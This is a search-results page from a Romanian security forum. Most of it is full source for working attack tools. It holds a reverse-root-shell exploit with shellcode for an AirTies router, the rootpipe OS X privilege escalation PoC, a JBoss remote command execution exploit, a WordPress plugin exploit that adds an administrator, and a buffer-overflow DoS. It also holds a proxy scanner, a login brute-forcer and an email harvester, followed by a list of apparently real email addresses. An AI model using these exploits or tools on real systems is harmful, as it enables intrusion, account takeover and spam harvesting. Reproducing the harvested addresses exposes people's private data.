Jump to content

Search the Community

Showing results for tags 'import'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges
    • Bug Bounty
    • Programare
    • Reverse engineering & exploit development
    • Mobile phones
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Sugestii
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Categories

There are no results to display.

There are no results to display.

Blogs

There are no results to display.

There are no results to display.


Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

Found 16 results

  1. MasterLight

    .

    .
  2. # Exploit Title: Son HTTP HServer stack buffer overflow # Date: 2015 June # Author: sleed - [URL="http://www.rstforums.com"]Romanian Security Team - Homepage[/URL] & Pwnthecode.org # Version: 0.9 # Tested on: Windows 8 # # Description: A simple bof denial of service in Son HTTP HServer # # import socket import struct payload = "\x42\x41\x43" * 80392 payload += "\x81\xc4\xf0\xea\xff\xff" + "B" * 70330 payload += "\x0r" + "C" * 110030 print "[+] sending payload: ", len(payload) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.0.100", 80)) buf = ( "GET /" + payload + " HTTP/1.1\r\n" + "Host: 192.168.0.101" + "\r\n\r\n" ) s.send(buf) s.close() //Cine are chef sa-si bata capul, sa TREACA DE ASLR si DEP e my guest
  3. Am cumparat acum cateva zile de la cineva acest scanner si in 2 zile de scanat cu el tot astept sa prind si eu 1 socks. ) Poate nu stiu eu sa-l folosesc rog pe cei care il testeaza sa posteze un feedback . python scanner.py start_ip-end_ip import sys import os import socket import urllib from random import randint def get_ports(): port=[] for i in range(0,65536): if(i!=80 and i!=1080): port.append(i) return port ports = get_ports() get_host = "https://www.google.com" socket.setdefaulttimeout(3) def getGeo(ip): return urllib.urlopen('http://ipinfo.io/'+ip+'/country').read() def get_ips(start_ip, stop_ip): ips = [] tmp = [] for i in start_ip.split('.'): tmp.append("%02X" % long(i)) start_dec = long(''.join(tmp), 16) tmp = [] for i in stop_ip.split('.'): tmp.append("%02X" % long(i)) stop_dec = long(''.join(tmp), 16) while(start_dec < stop_dec + 1): bytes = [] bytes.append(str(int(start_dec / 16777216))) rem = start_dec % 16777216 bytes.append(str(int(rem / 65536))) rem = rem % 65536 bytes.append(str(int(rem / 256))) rem = rem % 256 bytes.append(str(rem)) ips.append(".".join(bytes)) start_dec += 1 return ips def scan(ip): vuln = open('vuln.txt', 'a') for port in ports: try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip, port)) print "Am gasit unu!\n" vuln.write(ip + ":" + str(port)+'|'+getGeo(ip)+'\n') vuln.flush() s.send("GET " + get_host + " HTTP/1.0\r\n") s.send("\r\n") while 1: data = s.recv(1024) if not data: break print data s.close() except socket.error: print 'Scanez..' if len(sys.argv) < 2: print sys.argv[0] + "IP: start-end" sys.exit(1) else: if len(sys.argv) == 3: get_host = sys.argv[2] if sys.argv[1].find('-') > 0: start_ip, stop_ip = sys.argv[1].split("-") ips = get_ips(start_ip, stop_ip) while len(ips) > 0: i = randint(0, len(ips) - 1) aip = str(ips[i]) del ips[i] scan(aip) else: scan(sys.argv[1])
  4. MasterLight

    .

    .
  5. MasterLight

    .

    .
  6. ######################################################## # # PoC exploit code for rootpipe (CVE-2015-1130) # # Created by Emil Kvarnhammar, TrueSec # # Tested on OS X 10.7.5, 10.8.2, 10.9.5 and 10.10.2 # ######################################################## import os import sys import platform import re import ctypes import objc import sys from Cocoa import NSData, NSMutableDictionary, NSFilePosixPermissions from Foundation import NSAutoreleasePool def load_lib(append_path): return ctypes.cdll.LoadLibrary("/System/Library/PrivateFrameworks/" + append_path); def use_old_api(): return re.match("^(10.7|10.8)(.\d)?$", platform.mac_ver()[0]) args = sys.argv if len(args) != 3: print "usage: exploit.py source_binary dest_binary_as_root" sys.exit(-1) source_binary = args[1] dest_binary = os.path.realpath(args[2]) if not os.path.exists(source_binary): raise Exception("file does not exist!") pool = NSAutoreleasePool.alloc().init() attr = NSMutableDictionary.alloc().init() attr.setValue_forKey_(04777, NSFilePosixPermissions) data = NSData.alloc().initWithContentsOfFile_(source_binary) print "will write file", dest_binary if use_old_api(): adm_lib = load_lib("/Admin.framework/Admin") Authenticator = objc.lookUpClass("Authenticator") ToolLiaison = objc.lookUpClass("ToolLiaison") SFAuthorization = objc.lookUpClass("SFAuthorization") authent = Authenticator.sharedAuthenticator() authref = SFAuthorization.authorization() # authref with value nil is not accepted on OS X <= 10.8 authent.authenticateUsingAuthorizationSync_(authref) st = ToolLiaison.sharedToolLiaison() tool = st.tool() tool.createFileWithContents_path_attributes_(data, dest_binary, attr) else: adm_lib = load_lib("/SystemAdministration.framework/SystemAdministration") WriteConfigClient = objc.lookUpClass("WriteConfigClient") client = WriteConfigClient.sharedClient() client.authenticateUsingAuthorizationSync_(None) tool = client.remoteProxy() tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0) print "Done!" del pool
  7. Salut am de facut un mini paint la facultate . Creati un editor grafic simplu, cu 3 butoane: de adaugare in fereastra a unui cerc, de adaugare a unui patrat si de stergere a unei forme (cerc sau patrat) -forma ce se poate selecta cu mouse-ul. /** * Created by on 4/6/2015. */ import javax.swing.*; import java.awt.*; import java.awt.event.ActionEvent; import java.awt.event.ActionListener; import java.awt.event.MouseEvent; import java.awt.event.MouseListener; import java.awt.geom.Ellipse2D; import java.util.ArrayList; /** * Created by Angheluta on 4/6/2015. */ public class Main extends JFrame implements ActionListener,MouseListener{ JButton b1; JButton b2; JButton b3; int x,y,x1,y1; int x3,y3; String nume=" "; ArrayList<Dreptunghi> dreptunghis = new ArrayList<Dreptunghi>(); ArrayList<cerc> cercs =new ArrayList<cerc>(); public Main(){ b1 =new JButton("Dreptunghi"); b1.setBounds(10,20,100,20); b1.addActionListener(this); b2 =new JButton("Cerc"); b2.setBounds(120,20,100,20); b2.addActionListener(this); b3 =new JButton("Sterge"); b3.setBounds(220,20,100,20); b3.addActionListener(this); addMouseListener(this); add(b1); add(b2); add(b3); setLayout(null); setSize(600,600); setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE); setVisible(true); } public void paint(Graphics g) { if(nume.equals("Dreptunghi")) { for (Dreptunghi d : dreptunghis) { d.paint(g); } } if(nume.equals("Cerc")) { for(cerc c : cercs) { c.paint(g); } } } @M2G
  8. #!/usr/bin/env python ##################################################################################### # Exploit for the AIRTIES Air5650v3TT # Spawns a reverse root shell # Author: Batuhan Burakcin # Contact: batuhan@bmicrosystems.com # Twitter: @batuhanburakcin # Web: [url]http://www.bmicrosystems.com[/url] ##################################################################################### import sys import time import string import socket, struct import urllib, urllib2, httplib if __name__ == '__main__': try: ip = sys.argv[1] revhost = sys.argv[2] revport = sys.argv[3] except: print "Usage: %s <target ip> <reverse shell ip> <reverse shell port>" % sys.argv[0] host = struct.unpack('>L',socket.inet_aton(revhost))[0] port = string.atoi(revport) shellcode = "" shellcode += "\x24\x0f\xff\xfa\x01\xe0\x78\x27\x21\xe4\xff\xfd\x21\xe5\xff\xfd" shellcode += "\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\xaf\xa2\xff\xff" shellcode += "\x8f\xa4\xff\xff\x34\x0f\xff\xfd\x01\xe0\x78\x27\xaf\xaf\xff\xe0" shellcode += "\x3c\x0e" + struct.unpack('>cc',struct.pack('>H', port))[0] + struct.unpack('>cc',struct.pack('>H', port))[1] shellcode += "\x35\xce" + struct.unpack('>cc',struct.pack('>H', port))[0] + struct.unpack('>cc',struct.pack('>H', port))[1] shellcode += "\xaf\xae\xff\xe4" shellcode += "\x3c\x0e" + struct.unpack('>cccc',struct.pack('>I', host))[0] + struct.unpack('>cccc',struct.pack('>I', host))[1] shellcode += "\x35\xce" + struct.unpack('>cccc',struct.pack('>I', host))[2] + struct.unpack('>cccc',struct.pack('>I', host))[3] shellcode += "\xaf\xae\xff\xe6\x27\xa5\xff\xe2\x24\x0c\xff\xef\x01\x80\x30\x27" shellcode += "\x24\x02\x10\x4a\x01\x01\x01\x0c\x24\x11\xff\xfd\x02\x20\x88\x27" shellcode += "\x8f\xa4\xff\xff\x02\x20\x28\x21\x24\x02\x0f\xdf\x01\x01\x01\x0c" shellcode += "\x24\x10\xff\xff\x22\x31\xff\xff\x16\x30\xff\xfa\x28\x06\xff\xff" shellcode += "\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e\x2f" shellcode += "\x35\xce\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4\xff\xec" shellcode += "\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24\x02\x0f\xab" shellcode += "\x01\x01\x01\x0c" data = "\x41"*359 + "\x2A\xB1\x19\x18" + "\x41"*40 + "\x2A\xB1\x44\x40" data += "\x41"*12 + "\x2A\xB0\xFC\xD4" + "\x41"*16 + "\x2A\xB0\x7A\x2C" data += "\x41"*28 + "\x2A\xB0\x30\xDC" + "\x41"*240 + shellcode + "\x27\xE0\xFF\xFF"*48 pdata = { 'redirect' : data, 'self' : '1', 'user' : 'tanri', 'password' : 'ihtiyacmyok', 'gonder' : 'TAMAM' } login_data = urllib.urlencode(pdata) #print login_data url = 'http://%s/cgi-bin/login' % ip header = {} req = urllib2.Request(url, login_data, header) rsp = urllib2.urlopen(req) Source
  9. /* * JBoss JMXInvokerServlet Remote Command Execution * JMXInvoker.java v0.3 - Luca Carettoni @_ikki * * This code exploits a common misconfiguration in JBoss Application Server (4.x, 5.x, ...). * Whenever the JMX Invoker is exposed with the default configuration, a malicious "MarshalledInvocation" * serialized Java object allows to execute arbitrary code. This exploit works even if the "Web-Console" * and the "JMX Console" are protected or disabled. * * [FAQ] * * Q: Is my target vulnerable? * A: If http://<target>:8080/invoker/JMXInvokerServlet exists, it's likely exploitable * * Q: How to fix it? * A: Enable authentication in "jmx-invoker-service.xml" * * Q: Is this exploit version-dependent? * A: Unfortunately, yes. An hash value is used to properly invoke a method. * At least comparing version 4.x and 5.x, these hashes are different. * * Q: How to compile and launch it? * A: javac -cp ./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker.java * java -cp .:./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker * Yes, it's a Java exploit. I can already see some of you complaining.... */ import java.io.BufferedReader; import java.io.IOException; import java.io.InputStream; import java.io.InputStreamReader; import java.io.ObjectOutputStream; import java.lang.reflect.Array; import java.lang.reflect.Field; import java.lang.reflect.Method; import java.net.ConnectException; import java.net.HttpURLConnection; import java.net.URL; import javax.management.MalformedObjectNameException; import javax.management.ObjectName; import org.jboss.invocation.MarshalledInvocation; //within jboss.jar (look into the original JBoss installation dir) public class JMXInvokerServlet { //---------> CHANGE ME <--------- static final int hash = 647347722; //Weaponized against JBoss 4.0.3SP1 static final String url = "http://127.0.0.1:8080/invoker/JMXInvokerServlet"; static final String cmd = "touch /tmp/exectest"; //------------------------------- public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, MalformedObjectNameException { System.out.println("\n--[ JBoss JMXInvokerServlet Remote Command Execution ]"); //Create a malicious Java serialized object MarshalledInvocation payload = new MarshalledInvocation(); payload.setObjectName(new Integer(hash)); //Executes the MBean invoke operation Class<?> c = Class.forName("javax.management.MBeanServerConnection"); Method method = c.getDeclaredMethod("invoke", javax.management.ObjectName.class, java.lang.String.class, java.lang.Object[].class, java.lang.String[].class); payload.setMethod(method); //Define MBean's name, operation and pars Object myObj[] = new Object[4]; //MBean object name myObj[0] = new ObjectName("jboss.deployer:service=BSHDeployer"); //Operation name myObj[1] = new String("createScriptDeployment"); //Actual parameters myObj[2] = new String[]{"Runtime.getRuntime().exec(\"" + cmd + "\");", "Script Name"}; //Operation signature myObj[3] = new String[]{"java.lang.String", "java.lang.String"}; payload.setArguments(myObj); System.out.println("\n--[*] MarshalledInvocation object created"); //For debugging - visualize the raw object //System.out.println(dump(payload)); //Serialize the object try { //Send the payload URL server = new URL(url); HttpURLConnection conn = (HttpURLConnection) server.openConnection(); conn.setRequestMethod("POST"); conn.setDoOutput(true); conn.setDoInput(true); conn.setUseCaches(false); conn.setRequestProperty("Accept", "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"); conn.setRequestProperty("Connection", "keep-alive"); conn.setRequestProperty("User-Agent", "Java/1.6.0_06"); conn.setRequestProperty("Content-Type", "application/octet-stream"); conn.setRequestProperty("Accept-Encoding", "x-gzip,x-deflate,gzip,deflate"); conn.setRequestProperty("ContentType", "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation"); ObjectOutputStream wr = new ObjectOutputStream(conn.getOutputStream()); wr.writeObject(payload); System.out.println("\n--[*] MarshalledInvocation object serialized"); System.out.println("\n--[*] Sending payload..."); wr.flush(); wr.close(); //Get the response InputStream is = conn.getInputStream(); BufferedReader rd = new BufferedReader(new InputStreamReader(is)); String line; StringBuffer response = new StringBuffer(); while ((line = rd.readLine()) != null) { response.append(line); } rd.close(); if (response.indexOf("Script Name") != -1) { System.out.println("\n--[*] \"" + cmd + "\" successfully executed"); } else { System.out.println("\n--[!] An invocation error occured..."); } } catch (ConnectException cex) { System.out.println("\n--[!] A connection error occured..."); } catch (IOException ex) { ex.printStackTrace(); } } /* * Raw dump of generic Java Objects */ static String dump(Object o) { StringBuffer buffer = new StringBuffer(); Class oClass = o.getClass(); if (oClass.isArray()) { buffer.append("["); for (int i = 0; i < Array.getLength(o); i++) { if (i > 0) { buffer.append(",\n"); } Object value = Array.get(o, i); buffer.append(value.getClass().isArray() ? dump(value) : value); } buffer.append("]"); } else { buffer.append("{"); while (oClass != null) { Field[] fields = oClass.getDeclaredFields(); for (int i = 0; i < fields.length; i++) { if (buffer.length() > 1) { buffer.append(",\n"); } fields[i].setAccessible(true); buffer.append(fields[i].getName()); buffer.append("="); try { Object value = fields[i].get(o); if (value != null) { buffer.append(value.getClass().isArray() ? dump(value) : value); } } catch (IllegalAccessException e) { } } oClass = oClass.getSuperclass(); } buffer.append("}"); } return buffer.toString(); } } Source
  10. MasterLight

    .

    .
  11. #!/usr/bin/python # # Exploit Name: WP Marketplace 2.4.0 Remote Command Execution # # Vulnerability discovered by Kacper Szurek (http://security.szurek.pl) # # Exploit written by Claudio Viviani # # # # -------------------------------------------------------------------- # # The vulnerable function is located on "wpmarketplace/libs/cart.php" file: # # function ajaxinit(){ # if(isset($_POST['action']) && $_POST['action']=='wpmp_pp_ajax_call'){ # if(function_exists($_POST['execute'])) # call_user_func($_POST['execute'],$_POST); # else # echo __("function not defined!","wpmarketplace"); # die(); # } #} # # Any user from any post/page can call wpmp_pp_ajax_call() action (wp hook). # wpmp_pp_ajax_call() call functions by call_user_func() through POST data: # # if (function_exists($_POST['execute'])) # call_user_func($_POST['execute'], $_POST); # else # ... # ... # ... # # $_POST data needs to be an array # # # The wordpress function wp_insert_user is perfect: # # http://codex.wordpress.org/Function_Reference/wp_insert_user # # Description # # Insert a user into the database. # # Usage # # <?php wp_insert_user( $userdata ); ?> # # Parameters # # $userdata # (mixed) (required) An array of user data, stdClass or WP_User object. # Default: None # # # # Evil POST Data (Add new Wordpress Administrator): # # action=wpmp_pp_ajax_call&execute=wp_insert_user&user_login=NewAdminUser&user_pass=NewAdminPassword&role=administrator # # --------------------------------------------------------------------- # # Dork google: index of "wpmarketplace" # # Tested on WP Markeplace 2.4.0 version with BackBox 3.x and python 2.6 # # Http connection import urllib, urllib2, socket # import sys # String manipulator import string, random # Args management import optparse # Check url def checkurl(url): if url[:8] != "https://" and url[:7] != "http://": print('[X] You must insert http:// or https:// procotol') sys.exit(1) else: return url # Check if file exists and has readable def checkfile(file): if not os.path.isfile(file) and not os.access(file, os.R_OK): print '[X] '+file+' file is missing or not readable' sys.exit(1) else: return file def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits): return ''.join(random.choice(chars) for _ in range(size)) banner = """ ___ ___ __ | Y .-----.----.--| .-----.----.-----.-----.-----. |. | | _ | _| _ | _ | _| -__|__ --|__ --| |. / \ |_____|__| |_____| __|__| |_____|_____|_____| |: | |__| |::.|:. | `--- ---' ___ ___ __ __ __ | Y .---.-.----| |--.-----| |_.-----| .---.-.----.-----. |. | _ | _| <| -__| _| _ | | _ | __| -__| |. \_/ |___._|__| |__|__|_____|____| __|__|___._|____|_____| |: | | |__| |::.|:. | `--- ---' WP Marketplace R3m0t3 C0d3 Ex3cut10n (Add WP Admin) v2.4.0 Written by: Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww """ commandList = optparse.OptionParser('usage: %prog -t URL [--timeout sec]') commandList.add_option('-t', '--target', action="store", help="Insert TARGET URL: http[s]://www.victim.com[:PORT]", ) commandList.add_option('--timeout', action="store", default=10, type="int", help="[Timeout Value] - Default 10", ) options, remainder = commandList.parse_args() # Check args if not options.target: print(banner) commandList.print_help() sys.exit(1) host = checkurl(options.target) timeout = options.timeout print(banner) socket.setdefaulttimeout(timeout) username = id_generator() pwd = id_generator() body = urllib.urlencode({'action' : 'wpmp_pp_ajax_call', 'execute' : 'wp_insert_user', 'user_login' : username, 'user_pass' : pwd, 'role' : 'administrator'}) headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'} print "[+] Tryng to connect to: "+host try: req = urllib2.Request(host+"/", body, headers) response = urllib2.urlopen(req) html = response.read() if html == "": print("[!] Account Added") print("[!] Location: "+host+"/wp-login.php") print("[!] Username: "+username) print("[!] Password: "+pwd) else: print("[X] Exploitation Failed :(") except urllib2.HTTPError as e: print("[X] "+str(e)) except urllib2.URLError as e: print("[X] Connection Error: "+str(e)) Source
  12. #!/usr/bin/python import sys import re import string import httplib import urllib2 import re def StripTags(text): finished = 0 while not finished: finished = 1 start = text.find("<") if start >= 0: stop = text[start:].find(">") if stop >= 0: text = text[:start] + text[start+stop+1:] finished = 0 return text if len(sys.argv) != 2: print "\nExtracts emails from google results.\n" print "\nUsage : ./goog-mail.py <domain-name>\n" sys.exit(1) domain_name=sys.argv[1] d={} page_counter = 0 try: while page_counter < 50 : results = 'http://groups.google.com/groups?q='+str(domain_name)+'&hl=en&lr=&ie=UTF-8&start=' + repr(page_counter) + '&sa=N' request = urllib2.Request(results) request.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)') opener = urllib2.build_opener() text = opener.open(request).read() emails = (re.findall('([\w\.\-]+@'+domain_name+')',StripTags(text))) for email in emails: d[email]=1 uniq_emails=d.keys() page_counter = page_counter +10 except IOError: print "Can't connect to Google Groups!"+"" page_counter_web=0 try: print "\n\n+++++++++++++++++++++++++++++++++++++++++++++++++++++"+"" print "+ Google Web & Group Results:"+"" print "+++++++++++++++++++++++++++++++++++++++++++++++++++++\n\n"+"" while page_counter_web < 50 : results_web = 'http://www.google.com/search?q=%40'+str(domain_name)+'&hl=en&lr=&ie=UTF-8&start=' + repr(page_counter_web) + '&sa=N' request_web = urllib2.Request(results_web) request_web.add_header('User-Agent','Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)') opener_web = urllib2.build_opener() text = opener_web.open(request_web).read() emails_web = (re.findall('([\w\.\-]+@'+domain_name+')',StripTags(text))) for email_web in emails_web: d[email_web]=1 uniq_emails_web=d.keys() page_counter_web = page_counter_web +10 except IOError: print "Can't connect to Google Web!"+"" for uniq_emails_web in d.keys(): print uniq_emails_web+"" Sursa Test ! anci-ste@alice.it fcrovace@alice.it antorake@alice.it lauradilu@alice.it salvo_brusca67@alice.it pagescaos_calmo@alice.it claudio.maccherani@alice.it pagesaicelombarda@alice.it monicagasbarri@alice.it S.Camillo-Forlaninilportalone@alice.it materli1@alice.it lsantini@alice.it pincopallino@alice.it gratours@alice.it aicelombarda@alice.it Castrofilippofilippafarruggio@alice.it pagesfcrovace@alice.it luci.ba@alice.it poate il face cineva sa mearga mai bine prinde maxim 10-20 email-uri si se opreste .. Il rog frumos sa-mi dea si mie sau sa posteze !
  13. #!/usr/bin/python # Cross-Site Tracer by 1N3 v20150224 # https://crowdshield.com # # ABOUT: A quick and easy script to check remote web servers for Cross-Site Tracing. For more robust mass scanning, create a list of domains or IP addresses to iterate through by running 'for a in `cat targets.txt`; do ./xsstracer.py $a 80; done;' # # USAGE: xsstracer.py <IP/host> <port> # import socket import time import sys, getopt class bcolors: HEADER = '\033[95m' OKBLUE = '\033[94m' OKGREEN = '\033[92m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' def main(argv): argc = len(argv) if argc <= 2: print bcolors.OKBLUE + "+ -- --=[Cross-Site Tracer by 1N3 v20150224" + bcolors.ENDC print bcolors.OKBLUE + "+ -- --=[" + bcolors.UNDERLINE + "https://crowdshield.com" + bcolors.ENDC print bcolors.OKBLUE + "+ -- --=[usage: %s <host> <port>" % (argv[0]) + bcolors.ENDC sys.exit(0) target = argv[1] # SET TARGET port = argv[2] # SET PORT buffer1 = "TRACE / HTTP/1.1" buffer2 = "Test: <script>alert(1);</script>" buffer3 = "Host: " + target print "" print bcolors.OKBLUE + "+ -- --=[Cross-Site Tracer by 1N3 " print bcolors.OKBLUE + "+ -- --=[https://crowdshield.com" print bcolors.OKBLUE + "+ -- --=[Target: " + target + ":" + port s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) result=s.connect_ex((target,int(port))) s.settimeout(1.0) if result == 0: s.send(buffer1 + "\n") s.send(buffer2 + "\n") s.send(buffer3 + "\n\n") data = s.recv(1024) script = "alert" if script.lower() in data.lower(): print bcolors.FAIL + "+ -- --=[Site vulnerable to XST!" + bcolors.ENDC print "" print bcolors.WARNING + data + bcolors.ENDC else: print bcolors.OKGREEN + "+ -- --=[Site not vulnerable to XST!" print "" print "" else: print bcolors.WARNING + "+ -- --=[Port is closed!" + bcolors.ENDC s.close() main(sys.argv) Download Source
  14. Hadoop User Experience password cracking script. Written in Python. #!/usr/bin/python import sys import requests import datetime from fake_useragent import UserAgent ## CONFIG STARTS HERE ## user = "admin" host = "hostname:port" listfile = "~/dictionaries/top1000-worst-passwords.txt" ## CONFIG ENDS HERE## dictionary = open(listfile) list = dictionary.readlines() words = [ ] print "Initializing dictionary", for entry in list: print('.'), newword = entry.rstrip("\n") words.append(newword) print "Now testing " for password in words: ua = UserAgent().random headers = { "User-Agent" : ua } post = { "username" : user, "password" : password } r = requests.post("http://" + host + "/accounts/login/?next=/", headers=headers, data=post) invalid = r.text.find("Invalid") if invalid == -1: print "\nSuccess! " + user + ":" + password print "Completed test at ", print datetime.datetime.now() sys.exit() else: print "...." print "Attack unsuccessful...Completed at ", Source
×
×
  • Create New...